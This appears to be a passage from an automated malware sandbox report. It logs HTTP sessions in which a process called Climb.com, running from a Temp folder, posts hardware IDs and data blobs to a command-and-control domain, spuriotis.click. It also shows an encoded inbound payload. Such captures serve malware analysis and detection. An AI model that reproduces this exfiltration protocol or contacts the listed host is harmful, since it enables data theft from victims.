2024-12-28 08:34:55 UTC	248	IN	Data Raw: 34 39 31 63 0d 0a 33 77 43 44 64 4f 35 48 44 44 52 55 7a 51 4b 52 39 71 4b 35 49 36 76 35 71 38 7a 6e 36 35 57 57 73 47 6d 50 65 2f 64 66 47 51 47 6b 49 76 56 57 31 48 4d 67 46 69 65 6f 49 4b 75 43 30 4d 78 47 68 39 76 4b 71 4d 58 52 38 2f 66 63 47 75 70 58 31 53 6c 30 49 2b 56 6d 34 68 69 64 49 69 41 57 4d 62 55 67 71 36 33 5a 6d 30 62 46 32 35 48 75 67 6f 48 33 39 39 77 4c 37 68 43 59 4c 33 56 69 74 32 7a 6b 48 49 73 6b 61 46 55 34 6f 47 66 30 6b 38 50 54 54 63 4b 55 77 36 48 46 78 37 66 7a 79 6b 75 31 57 62 6f 36 62 57 43 53 59 66 41 66 7a 44 6f 67 54 33 61 6f 62 4c 50 4d 67 4e 68 47 79 5a 58 4e 71 49 79 44 2f 66 37 55 43 75 73 52 68 7a 5a 2f 61 62 64 69 35 78 32 42 4c 58 78 59 4d 71 64 73 38 70 6e 44 6d 77 2b 4a 6e 4e 48 75 33 63 Data Ascii: 491c3wCDdO5HDDRUzQKR9qK5I6v5q8zn65WWsGmPe/dfGQGkIvVW1HMgFieoIKuC0MxGh9vKqMXR8/fcGupX1Sl0I+Vm4hidIiAWMbUgq63Zm0bF25HugoH399wL7hCYL3Vit2zkHIskaFU4oGf0k8PTTcKUw6HFx7fzyku1Wbo6bWCSYfAfzDogT3aobLPMgNhGyZXNqIyD/f7UCusRhzZ/abdi5x2BLXxYMqds8pnDmw+JnNHu3c
2024-12-28 08:34:55 UTC	1369	IN	Data Raw: 6d 6b 78 74 45 61 2f 41 79 59 4c 58 30 6a 6f 69 7a 34 56 6f 73 70 4c 67 35 32 70 32 7a 39 6b 63 50 55 52 73 69 62 32 36 47 46 69 76 2f 38 31 67 48 69 46 70 6f 7a 63 57 53 31 61 2b 59 5a 69 79 31 6f 57 54 58 76 4c 72 4f 54 32 4a 73 5a 69 62 76 5a 72 59 61 64 2b 75 57 53 46 4b 4d 41 31 54 70 33 49 2b 55 69 35 78 69 4e 4b 47 35 45 50 71 52 72 39 6f 62 4c 30 6b 7a 45 6d 38 53 6b 69 6f 72 33 38 39 67 42 34 68 4f 52 4d 48 5a 6c 76 57 4b 68 57 4d 77 69 64 68 5a 75 37 30 50 32 68 4d 66 58 56 34 75 68 69 62 48 4c 6b 4c 66 7a 33 6b 75 31 57 5a 30 34 65 47 43 32 62 65 49 65 68 7a 64 75 52 44 43 69 5a 65 47 53 78 64 56 4c 79 6f 6e 44 6f 49 4f 4b 2f 76 2f 62 44 75 6f 64 31 58 4d 37 5a 4b 55 69 75 56 61 74 4b 47 56 61 50 4c 68 67 73 34 75 4f 77 67 48 4f 6c 34 6e 32 78 Data Ascii: mkxtEa/AyYLX0joiz4VospLg52p2z9kcPURsib26GFiv/81gHiFpozcWS1a+YZiy1oWTXvLrOT2JsZibvZrYad+uWSFKMA1Tp3I+Ui5xiNKG5EPqRr9obL0kzEm8Skior389gB4hORMHZlvWKhWMwidhZu70P2hMfXV4uhibHLkLfz3ku1WZ04eGC2beIehzduRDCiZeGSxdVLyonDoIOK/v/bDuod1XM7ZKUiuVatKGVaPLhgs4uOwgHOl4n2x
2024-12-28 08:34:55 UTC	1369	IN	Data Raw: 53 52 61 30 65 6a 58 30 6a 49 35 64 68 39 52 57 47 5a 31 74 56 4f 4b 46 6e 35 64 54 66 6c 56 69 4a 6e 4d 58 75 33 63 6e 36 39 64 6f 4e 2f 78 61 59 50 6e 56 74 73 6d 66 75 48 6f 77 6c 59 31 4d 79 70 47 76 77 6d 63 54 4a 53 38 6d 54 7a 4b 2b 50 67 37 65 36 6b 67 7a 31 57 63 31 39 53 6e 53 32 49 4e 51 56 67 69 74 70 51 48 61 77 4c 75 72 55 78 39 63 42 6b 64 76 45 70 6f 43 4d 2b 50 58 59 42 65 67 54 6d 54 56 31 59 4b 39 74 35 52 61 41 4c 57 52 62 4f 4b 74 6f 2b 70 2f 4c 33 55 48 49 6b 59 6e 67 78 59 37 76 74 49 70 4c 32 52 36 5a 4d 48 51 68 69 47 48 76 47 49 73 7a 4c 6b 6c 34 74 69 44 30 6d 49 43 44 41 63 57 53 79 61 57 50 6a 66 66 7a 33 77 37 75 48 70 59 77 66 47 6d 7a 5a 65 55 61 68 53 68 6f 56 6a 47 72 5a 65 47 52 79 64 64 4e 69 64 57 4a 71 5a 33 4a 72 37 Data Ascii: SRa0ejX0jI5dh9RWGZ1tVOKFn5dTflViJnMXu3cn69doN/xaYPnVtsmfuHowlY1MypGvwmcTJS8mTzK+Pg7e6kgz1Wc19SnS2INQVgitpQHawLurUx9cBkdvEpoCM+PXYBegTmTV1YK9t5RaALWRbOKto+p/L3UHIkYngxY7vtIpL2R6ZMHQhiGHvGIszLkl4tiD0mICDAcWSyaWPjffz3w7uHpYwfGmzZeUahShoVjGrZeGRyddNidWJqZ3Jr7
2024-12-28 08:34:55 UTC	1369	IN	Data Raw: 57 63 31 39 63 6d 71 76 62 4f 38 66 67 53 4e 6d 55 54 69 69 61 2f 57 66 78 39 78 48 78 4a 50 45 71 34 61 49 38 2f 37 41 43 4f 59 54 6d 44 63 37 4c 66 31 6c 2b 56 62 55 5a 55 6c 61 48 37 39 37 34 59 4b 41 78 41 2f 51 32 38 36 69 78 64 47 33 39 39 30 43 34 68 47 64 4d 6e 52 6e 73 32 54 6e 47 34 6b 71 5a 45 51 2b 6f 57 33 34 6d 38 76 4a 51 63 53 66 78 61 71 4e 67 76 32 30 6e 45 76 71 41 64 56 6c 4f 31 61 77 62 65 45 56 6d 6d 56 78 47 43 2f 76 5a 2f 2f 55 6d 4a 74 4e 78 35 76 47 6f 6f 6d 43 2f 2f 58 65 42 65 6f 63 6e 44 56 7a 63 62 78 6d 36 52 65 43 4b 6d 39 53 4d 36 70 6b 39 4a 44 47 31 41 47 48 32 38 36 32 78 64 47 33 32 2f 55 2b 72 7a 69 76 66 57 51 74 70 43 4c 6d 47 73 78 39 4c 6c 6f 31 6f 32 6a 38 6b 73 6e 58 53 38 43 51 78 61 57 42 68 66 37 78 31 41 72 Data Ascii: Wc19cmqvbO8fgSNmUTiia/Wfx9xHxJPEq4aI8/7ACOYTmDc7Lf1l+VbUZUlaH7974YKAxA/Q286ixdG3990C4hGdMnRns2TnG4kqZEQ+oW34m8vJQcSfxaqNgv20nEvqAdVlO1awbeEVmmVxGC/vZ//UmJtNx5vGoomC//XeBeocnDVzcbxm6ReCKm9SM6pk9JDG1AGH2862xdG32/U+rzivfWQtpCLmGsx9Llo1o2j8ksnXS8CQxaWBhf7x1Ar
2024-12-28 08:34:55 UTC	1369	IN	Data Raw: 33 78 71 72 32 7a 73 47 59 51 74 5a 31 63 79 71 6d 33 31 6d 4d 72 61 52 73 65 56 77 65 37 4c 79 66 44 73 6b 6c 4f 74 4f 49 55 6d 61 58 57 77 51 2b 77 5a 7a 44 6f 67 54 33 61 6f 62 4c 50 4d 67 4e 4a 54 7a 5a 62 62 70 34 4b 48 2b 50 66 41 43 75 41 53 68 7a 70 30 5a 37 70 75 35 78 6d 4b 4a 47 74 63 4f 71 68 6c 2b 4a 76 4d 6d 77 2b 4a 6e 4e 48 75 33 63 6e 5a 2f 38 45 63 37 68 65 65 4b 32 41 6a 6f 69 7a 34 56 6f 73 70 4c 67 35 32 72 47 76 34 6b 4d 44 58 51 63 32 57 79 62 79 4b 6a 76 44 39 32 52 6e 6e 48 70 49 32 63 32 69 79 5a 50 4d 61 67 6a 64 72 52 43 54 76 4c 72 4f 54 32 4a 73 5a 69 61 33 4f 76 70 57 4b 74 63 58 45 43 50 73 53 6d 44 45 37 66 50 4e 37 6f 52 47 41 5a 54 59 57 4d 4b 42 70 38 4a 76 42 30 6b 33 45 6e 73 43 72 68 49 2f 7a 2f 74 67 4c 36 78 2b 55 Data Ascii: 3xqr2zsGYQtZ1cyqm31mMraRseVwe7LyfDsklOtOIUmaXWwQ+wZzDogT3aobLPMgNJTzZbbp4KH+PfACuAShzp0Z7pu5xmKJGtcOqhl+JvMmw+JnNHu3cnZ/8Ec7heeK2Ajoiz4VospLg52rGv4kMDXQc2WybyKjvD92RnnHpI2c2iyZPMagjdrRCTvLrOT2JsZia3OvpWKtcXECPsSmDE7fPN7oRGAZTYWMKBp8JvB0k3EnsCrhI/z/tgL6x+U
2024-12-28 08:34:55 UTC	1369	IN	Data Raw: 31 6c 37 56 62 55 5a 57 31 52 4e 61 35 71 2b 70 6a 50 33 45 58 62 6b 63 36 38 68 49 6a 38 2b 64 34 4c 34 42 53 66 50 48 4a 75 73 57 2f 6d 45 59 4d 67 4c 68 68 32 71 48 69 7a 7a 49 44 36 54 4d 4b 58 6b 76 54 46 6c 72 6e 74 6b 67 7a 68 57 63 31 39 65 32 6d 34 61 4f 77 56 67 79 5a 38 56 7a 43 39 59 50 36 65 30 74 46 4b 7a 4a 62 45 6f 34 61 50 38 66 2f 65 47 65 51 5a 6c 6a 59 37 4c 66 31 6c 2b 56 62 55 5a 55 31 42 49 4b 56 6e 2f 34 4c 4c 32 6b 4c 66 6c 74 6e 75 79 38 6e 6d 38 38 4e 4c 74 51 2b 46 4b 6e 78 38 38 33 75 68 45 59 42 6c 4e 68 59 77 70 6d 62 30 6b 73 37 4a 52 4d 2b 55 78 71 65 4d 6a 66 2f 33 30 67 2f 70 48 70 41 2b 64 32 69 36 59 65 34 53 68 53 74 6e 57 58 62 68 49 50 53 4d 67 49 4d 42 36 49 44 4b 6f 6f 6a 4a 36 4c 72 4c 53 2b 6f 56 31 57 55 37 62 Data Ascii: 1l7VbUZW1RNa5q+pjP3EXbkc68hIj8+d4L4BSfPHJusW/mEYMgLhh2qHizzID6TMKXkvTFlrntkgzhWc19e2m4aOwVgyZ8VzC9YP6e0tFKzJbEo4aP8f/eGeQZljY7Lf1l+VbUZU1BIKVn/4LL2kLfltnuy8nm88NLtQ+FKnx883uhEYBlNhYwpmb0ks7JRM+UxqeMjf/30g/pHpA+d2i6Ye4ShStnWXbhIPSMgIMB6IDKoojJ6LrLS+oV1WU7b
2024-12-28 08:34:55 UTC	1369	IN	Data Raw: 64 6d 69 42 70 51 48 53 61 59 2f 32 61 78 38 30 42 31 71 53 48 37 6f 71 54 74 36 7a 72 45 71 30 65 6d 58 30 6a 49 36 68 6c 34 52 47 57 4d 32 6c 61 4a 36 52 74 2f 37 62 50 33 46 66 4b 6c 4d 71 2f 6a 4d 58 38 2b 5a 4a 46 72 52 36 4e 66 53 4d 6a 6b 6d 58 33 46 61 4d 6d 66 31 39 32 34 53 44 30 67 6f 43 44 41 66 66 62 32 36 32 56 69 76 6a 6c 37 45 75 31 41 4b 74 39 63 48 57 36 63 75 49 41 68 79 68 69 52 77 6a 76 4f 4b 66 47 6b 6f 6b 54 6d 34 53 4a 73 62 72 48 74 2f 57 53 55 39 51 41 31 53 73 37 4f 2b 38 73 6f 51 54 4d 66 53 34 52 4e 62 31 79 39 5a 66 57 32 41 62 33 70 65 36 34 6a 34 37 6e 38 38 55 45 72 56 66 56 4d 6a 73 37 68 43 4c 6f 45 5a 63 30 65 46 73 6d 71 43 44 4d 32 6f 44 44 41 5a 48 62 2f 4b 32 4c 68 2f 44 69 77 30 62 4b 44 35 38 36 61 32 53 71 62 61 Data Ascii: dmiBpQHSaY/2ax80B1qSH7oqTt6zrEq0emX0jI6hl4RGWM2laJ6Rt/7bP3FfKlMq/jMX8+ZJFrR6NfSMjkmX3FaMmf1924SD0goCDAffb262Vivjl7Eu1AKt9cHW6cuIAhyhiRwjvOKfGkokTm4SJsbrHt/WSU9QA1Ss7O+8soQTMfS4RNb1y9ZfW2Ab3pe64j47n88UErVfVMjs7hCLoEZc0eFsmqCDM2oDDAZHb/K2Lh/Diw0bKD586a2Sqba
2024-12-28 08:34:55 UTC	1369	IN	Data Raw: 5a 56 59 78 76 33 62 6f 32 4d 6a 59 57 39 4f 6c 39 34 57 4a 6a 2f 44 75 31 51 33 4c 4f 64 56 7a 4f 32 7a 39 4f 74 68 57 78 47 56 52 47 48 61 33 49 4b 76 55 39 64 68 50 78 35 7a 66 76 38 69 68 31 4d 37 6f 53 63 45 65 67 48 39 50 5a 4b 31 7a 36 68 75 41 5a 53 41 57 4d 4f 38 34 6f 39 71 41 33 31 43 4a 77 35 6e 38 33 74 79 6b 6f 34 4a 5a 38 6c 65 4d 66 57 30 6a 35 54 43 76 56 70 35 6c 4e 68 5a 78 72 48 4c 68 6b 73 50 4e 51 6f 36 6c 39 34 6d 4c 6a 76 62 69 77 68 7a 69 4a 36 73 6f 65 47 32 7a 5a 66 63 48 7a 47 73 75 57 58 62 33 57 62 50 63 67 4f 51 50 69 59 4f 4a 39 73 57 38 39 50 72 63 44 50 73 49 32 42 70 31 5a 4c 78 30 38 51 47 44 5a 53 41 57 4d 4f 38 34 6f 64 71 41 33 31 43 4a 77 35 6e 38 33 74 79 6b 6f 34 4a 5a 38 6c 65 4d 66 57 30 6a 35 54 43 76 56 70 35 Data Ascii: ZVYxv3bo2MjYW9Ol94WJj/Du1Q3LOdVzO2z9OthWxGVRGHa3IKvU9dhPx5zfv8ih1M7oScEegH9PZK1z6huAZSAWMO84o9qA31CJw5n83tyko4JZ8leMfW0j5TCvVp5lNhZxrHLhksPNQo6l94mLjvbiwhziJ6soeG2zZfcHzGsuWXb3WbPcgOQPiYOJ9sW89PrcDPsI2Bp1ZLx08QGDZSAWMO84odqA31CJw5n83tyko4JZ8leMfW0j5TCvVp5
2024-12-28 08:34:55 UTC	1369	IN	Data Raw: 62 6c 6a 73 39 71 41 31 77 47 52 32 38 69 6b 6c 59 54 34 38 35 34 4d 39 78 37 56 63 7a 74 74 2f 54 71 68 46 34 59 31 59 31 6b 78 34 32 62 39 6d 6f 44 45 44 39 44 62 33 2b 37 64 32 72 6d 30 77 45 75 31 57 64 49 2b 61 58 47 37 59 66 63 56 79 78 74 51 65 79 53 6f 63 50 44 57 38 64 5a 46 33 34 37 4b 76 6f 4b 33 79 64 6e 41 44 50 30 61 31 77 78 74 59 4c 31 73 35 6c 62 43 5a 58 59 57 62 75 39 4e 34 5a 50 51 32 41 47 48 32 38 58 75 33 63 6e 36 35 74 55 62 37 6c 57 53 4a 33 77 6a 6f 69 7a 34 56 70 70 6c 4e 67 56 34 37 33 4b 7a 7a 49 43 63 54 38 53 61 79 71 43 47 6d 2b 58 79 30 52 33 75 58 71 73 44 56 6e 47 36 63 75 4a 55 76 53 68 71 51 43 4f 73 63 50 53 71 2f 76 5a 54 7a 6f 76 4b 37 4b 6d 4f 2b 76 6a 73 4e 64 6f 49 6b 69 30 35 52 62 35 30 34 6c 62 43 5a 58 59 57 Data Ascii: bljs9qA1wGR28iklYT4854M9x7Vcztt/TqhF4Y1Y1kx42b9moDED9Db3+7d2rm0wEu1WdI+aXG7YfcVyxtQeySocPDW8dZF347KvoK3ydnADP0a1wxtYL1s5lbCZXYWbu9N4ZPQ2AGH28Xu3cn65tUb7lWSJ3wjoiz4VpplNgV473KzzICcT8SayqCGm+Xy0R3uXqsDVnG6cuJUvShqQCOscPSq/vZTzovK7KmO+vjsNdoIki05Rb504lbCZXYW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49766	172.67.128.184	443	7780	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:57 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PUFJDD4WX8DV89CDT6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12842 Host: spuriotis.click
2024-12-28 08:34:57 UTC	12842	OUT	Data Raw: 2d 2d 50 55 46 4a 44 44 34 57 58 38 44 56 38 39 43 44 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 50 55 46 4a 44 44 34 57 58 38 44 56 38 39 43 44 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 55 46 4a 44 44 34 57 58 38 44 56 38 39 43 44 54 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a Data Ascii: --PUFJDD4WX8DV89CDT6Content-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--PUFJDD4WX8DV89CDT6Content-Disposition: form-data; name="pid"2--PUFJDD4WX8DV89CDT6Content-Disposition: form-data; name="lid"5FwhVM--lll
2024-12-28 08:34:58 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=quopo478l5nhm4u43qpek911sv; expires=Wed, 23 Apr 2025 02:21:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O3domo3dmXlM3u1wjYro%2B%2Fz7OeBMYyvH%2FOozEsEUDXX8ENdBEn4V5vLR%2BaIsfRPbBSSz%2BsccAGGSTC%2B7jJcwymslai6KBgAOVWjAFWTlSWx3nQHHHOiR75qdhawgpP1zDV8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9036d6b8734390-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=2050&rtt_var=795&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=13781&delivery_rate=1354359&cwnd=243&unsent_bytes=0&cid=cd8c8ab4458c37ae&ts=930&x=0"
2024-12-28 08:34:58 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:34:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49772	172.67.128.184	443	7780	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:59 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=F4ETTRT10471M User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15044 Host: spuriotis.click
2024-12-28 08:34:59 UTC	15044	OUT	Data Raw: 2d 2d 46 34 45 54 54 52 54 31 30 34 37 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 46 34 45 54 54 52 54 31 30 34 37 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 34 45 54 54 52 54 31 30 34 37 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 46 34 45 54 54 52 54 31 30 34 37 31 4d Data Ascii: --F4ETTRT10471MContent-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--F4ETTRT10471MContent-Disposition: form-data; name="pid"2--F4ETTRT10471MContent-Disposition: form-data; name="lid"5FwhVM--lll--F4ETTRT10471M
2024-12-28 08:35:00 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:35:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8vu882s01c09a6ar1l2fr366om; expires=Wed, 23 Apr 2025 02:21:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RnWcO7j1J9Loj6rgWmuXpBS%2BZ0AX0dE5b7NmzzII7YdwMXuZW1OV2yq5jYW6x3cgwmi5teVs2aNZmDIWKZNPBf8Zxu5WMQtf2fahME47z562FkVSHkl2J1KPYgoRgaf9X%2Bg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9036e4e9834316-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1540&rtt_var=596&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15978&delivery_rate=1808049&cwnd=177&unsent_bytes=0&cid=dafc94366b15b4dd&ts=815&x=0"
2024-12-28 08:35:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:35:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49778	172.67.128.184	443	7780	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:02 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G7DEZVA16LULIC39DT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20399 Host: spuriotis.click
2024-12-28 08:35:02 UTC	15331	OUT	Data Raw: 2d 2d 47 37 44 45 5a 56 41 31 36 4c 55 4c 49 43 33 39 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 47 37 44 45 5a 56 41 31 36 4c 55 4c 49 43 33 39 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 37 44 45 5a 56 41 31 36 4c 55 4c 49 43 33 39 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a Data Ascii: --G7DEZVA16LULIC39DTContent-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--G7DEZVA16LULIC39DTContent-Disposition: form-data; name="pid"3--G7DEZVA16LULIC39DTContent-Disposition: form-data; name="lid"5FwhVM--lll
2024-12-28 08:35:02 UTC	5068	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x
2024-12-28 08:35:03 UTC	1127	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:35:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8pt9bmvbthv1ncsj176inc6t11; expires=Wed, 23 Apr 2025 02:21:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JqYZ2H0L0PeQXWzD9mEpV4UxoeZM08CH7m3JhKCLTH0L1t8ged3ffKMeQAFTO%2BVUEanKpyegeLBst%2FUueEW1hOattJbccq%2B6j2uOT7zAhuRJjAVFJ3ScZFtISf3kyasA4dA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9036f31cbf728c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1814&rtt_var=684&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21360&delivery_rate=1594756&cwnd=166&unsent_bytes=0&cid=02201d441ab9ee08&ts=976&x=0"
2024-12-28 08:35:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 08:35:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49784	172.67.128.184	443	7780	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:04 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=X9PI53GFX9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1177 Host: spuriotis.click
2024-12-28 08:35:04 UTC	1177	OUT	Data Raw: 2d 2d 58 39 50 49 35 33 47 46 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 58 39 50 49 35 33 47 46 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 39 50 49 35 33 47 46 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 58 39 50 49 35 33 47 46 58 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: 